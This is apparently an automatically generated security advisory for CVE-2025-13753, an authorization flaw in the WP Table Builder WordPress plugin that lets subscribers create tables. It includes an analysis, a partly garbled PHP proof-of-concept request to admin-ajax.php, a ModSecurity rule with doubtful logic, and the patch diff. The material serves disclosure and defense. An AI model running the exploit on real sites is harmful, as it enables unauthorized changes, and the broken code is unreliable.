Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13753: WP Table Builder <= 2.0.19 – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation (wp-table-builder)

CVE ID CVE-2025-13753
Plugin wp-table-builder
Severity Medium (CVSS 4.3)
CWE 863
Vulnerable Version 2.0.19
Patched Version 2.0.20
Disclosed January 7, 2026

Analysis Overview

{
“analysis”: “Atomic Edge analysis of CVE-2025-13753:nThis vulnerability is an incorrect authorization flaw in the WP Table Builder plugin for WordPress. The flaw allows authenticated users with Subscriber-level permissions or higher to create new table posts, an action intended for higher-privileged users. The vulnerability affects all plugin versions up to and including 2.0.19.nnnThe root cause is an insufficient authorization check in the `save_table()` function located in `/wp-table-builder/inc/admin/class-admin-menu.php`. The original code at line 75 only verified a nonce and checked if the user had the `Settings_Manager::ALLOWED_ROLE_META_CAP` capability. This capability check was insufficient to restrict the function to authorized users only, as it could be met by lower-privileged roles.nnThe exploitation method involves an authenticated attacker with Subscriber access sending a POST request to the WordPress admin AJAX endpoint. The attacker must target the `wp_ajax_wptb_save_table` action hook. The required payload includes a valid `security_code` nonce, which a Subscriber can obtain from their own session, and table data in the request body. The attack vector is `POST /wp-admin/admin-ajax.php` with the parameter `action=wptb_save_table`.nnThe patch adds a proper authorization check at the beginning of the `save_table()` function. The fix inserts a call to `WPTableBuilderAdminAuthorization::can_edit()` before any other logic. If this check fails, the script terminates. The patch also removes the flawed `current_user_can(Settings_Manager::ALLOWED_ROLE_META_CAP)` check from the nonce verification line, relying solely on the new authorization method.nnSuccessful exploitation allows an attacker to create arbitrary `wptb-table` custom post type entries. This constitutes unauthorized data modification. While this does not directly lead to remote code execution or site takeover, it can pollute the database, disrupt site content, and be used as a stepping stone in a broader attack chain aimed at privilege escalation or data integrity attacks.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2025-13753 – WP Table Builder <= 2.0.19 – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creationnn $login_url,n CURLOPT_RETURNTRANSFER => true,n CURLOPT_FOLLOWLOCATION => true,n CURLOPT_COOKIEJAR => ‘cookies.txt’,n CURLOPT_POST => true,n CURLOPT_POSTFIELDS => http_build_query([n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n ]),n CURLOPT_HEADER => truen]);n$response = curl_exec($ch);nn// Step 2: Fetch the WP Table Builder page to extract a security nonce.n// The nonce is typically found in page scripts or data attributes.n// This example assumes a nonce can be retrieved from a known script pattern.n// In a real scenario, you would parse the page HTML for ‘wptb-security-nonce’.n$placeholder_nonce = ‘EXTRACTED_NONCE_PLACEHOLDER’;n// For the PoC, we simulate a valid nonce. An actual exploit would extract it.nn// Step 3: Craft the malicious request to create a table.n$table_data = json_encode([n ‘security_code’ => $placeholder_nonce,n ‘table_data’ => ‘[[“Malicious Cell”]]’,n ‘table_title’ => ‘Atomic Edge Exploit Table’n]);nncurl_setopt_array($ch, [n CURLOPT_URL => $ajax_url,n CURLOPT_HTTPHEADER => [‘Content-Type: application/json’],n CURLOPT_POSTFIELDS => $table_data,n CURLOPT_POST => true,n CURLOPT_COOKIEFILE => ‘cookies.txt’,n CURLOPT_RETURNTRANSFER => true,n CURLOPT_HEADER => falsen]);nn$ajax_response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn// Step 4: Check the response.necho “HTTP Code: $http_code\n”;necho “Response: $ajax_response\n”;nif ($http_code == 200 && strpos($ajax_response, ‘table_id’) !== false) {n echo “[+] Table creation likely successful.\n”;n} else {n echo “[-] Exploit may have failed.\n”;n}nn?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2025-13753nSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:100013753,phase:2,deny,status:403,chain,msg:’CVE-2025-13753 via WP Table Builder AJAX – Unauthorized Table Creation’,severity:’MEDIUM’,tag:’CVE-2025-13753′,tag:’WordPress’,tag:’WP_Table_Builder'”n SecRule ARGS_POST:action “@streq wptb_save_table” “chain”n SecRule &ARGS_POST:security_code “!@eq 0” “chain”n SecRule REQUEST_HEADERS:Authorization “@eq 0” \n “t:none,setvar:’tx.cve_2025_13753_block=1′”nnSecRule TX:cve_2025_13753_block “@eq 1” \n “id:100013754,phase:2,deny,status:403,msg:’CVE-2025-13753 Block – Unauthenticated/Subscriber access to wptb_save_table’,severity:’MEDIUM’,tag:’CVE-2025-13753′””
}

Differential between vulnerable and patched code

Code Diff 
--- a/wp-table-builder/inc/admin/class-admin-menu.php
+++ b/wp-table-builder/inc/admin/class-admin-menu.php
@@ -68,9 +68,14 @@

 	public function save_table()
 	{
+
+		if (!WPTableBuilderAdminAuthorization::can_edit()) {
+			wp_die(json_encode(['security_problem', '']));
+		}
+
 		$params = json_decode(file_get_contents('php://input'));

-		$verified = current_user_can(Settings_Manager::ALLOWED_ROLE_META_CAP) && wp_verify_nonce($params->security_code, 'wptb-security-nonce');
+		$verified = wp_verify_nonce($params->security_code, 'wptb-security-nonce');
 		$import_verified = wp_verify_nonce($params->security_code, 'wptb-import-security-nonce');

 		if (!$verified && !$import_verified) {
--- a/wp-table-builder/v2/inc/WPTableBuilder.php
+++ b/wp-table-builder/v2/inc/WPTableBuilder.php
@@ -10,7 +10,7 @@
 class WPTableBuilder
 {

-    const VERSION = '2.0.19';
+    const VERSION = '2.0.20';

     public static function init()
     {
--- a/wp-table-builder/wp-table-builder.php
+++ b/wp-table-builder/wp-table-builder.php
@@ -16,7 +16,7 @@
  * Plugin Name:       WP Table Builder
  * Plugin URI:        https://wptablebuilder.com/
  * Description:       Drag and Drop Responsive Table Builder Plugin for WordPress.
- * Version:           2.0.19
+ * Version:           2.0.20
  * Author:            WP Table Builder
  * Author URI:        https://wptablebuilder.com//
  * License:           GPL-3.0+
@@ -97,7 +97,7 @@
      * Define Constants
      */

-    $current_version = '2.0.19';
+    $current_version = '2.0.20';


     define(__NAMESPACE__ . 'NS', __NAMESPACE__ . '\');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School